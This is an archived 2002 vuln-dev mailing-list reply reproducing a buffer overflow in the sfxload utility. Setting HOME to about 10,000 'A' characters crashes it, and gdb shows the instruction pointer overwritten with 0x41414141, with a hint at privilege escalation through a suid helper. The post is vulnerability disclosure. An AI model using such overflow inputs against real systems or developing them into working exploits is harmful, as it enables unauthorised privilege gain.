Re: sfxload issues.

From: Gabriel A. Maggiotti (gmaggiotat_private)
Date: Thu Jan 03 2002 - 12:53:30 PST

Next message: KF: "Retarded *feature* in ftp4all"

Previous message: Jon Williams: "Re: Clicktilluwin DLDER Trojan"
In reply to: l0rt: "sfxload issues."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I successfully reproduced it in my box

<qoute>
[root@tribilin /root]# cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i586

[root@tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
[root@tribilin /root]# ./sfxload
Segmentation fault (core dumped)
</quote>

                                                                 Regards,
Gabriel A. Maggiotti

Email:       gmaggiotat_private
Webpage: http://qb0x.net


----- Original Message -----
From: "l0rt" <simonat_private>
To: <vuln-devat_private>
Sent: Wednesday, January 02, 2002 5:53 PM
Subject: sfxload issues.


>
> Vendor : http://members.tripod.de/iwai/awedrv.html
> Program: sfxload
> OS     : RH 7.1
> Version: 0.4.3
> SUID   : No
> SGID   : No
> Issue  : This may get called by an suid helper binary which would allow
> a normal user to gain some more privs.
>
> --------------------------------------------------------------------------
>
> Details:
> [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
>
> /* I just set HOME to be [10235] A's */
>
> [raven] /u1/cores/testing/bin> sfxload
> Segmentation fault (core dumped)
>
> /* When xfsload is run it reads in the HOME var and cores!!! */
>
> [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload  /* gdb */
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...(no debugging symbols
> found)...
> (gdb) core core
> Core was generated by `AAAAAAAA'.
> Program terminated with signal 11, Segmentation fault.
> Reading symbols from /lib/i686/libm.so.6...done.
> Loaded symbols for /lib/i686/libm.so.6
> Reading symbols from /lib/i686/libc.so.6...done.
> Loaded symbols for /lib/i686/libc.so.6
> Reading symbols from /lib/ld-linux.so.2...done.
> Loaded symbols for /lib/ld-linux.so.2
> #0  0x41414141 in ?? ()
> (gdb) bt
> #0  0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> (gdb)
>
> /* EIP gets killed */
>
>
>
>
> --
> Regards,
> l0rt
>
> ------------------------------------------------------------
> "The only way to get rid of temptation is to give in to it."
>
>

Next message: KF: "Retarded *feature* in ftp4all"
Previous message: Jon Williams: "Re: Clicktilluwin DLDER Trojan"
In reply to: l0rt: "sfxload issues."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 03 2002 - 14:41:17 PST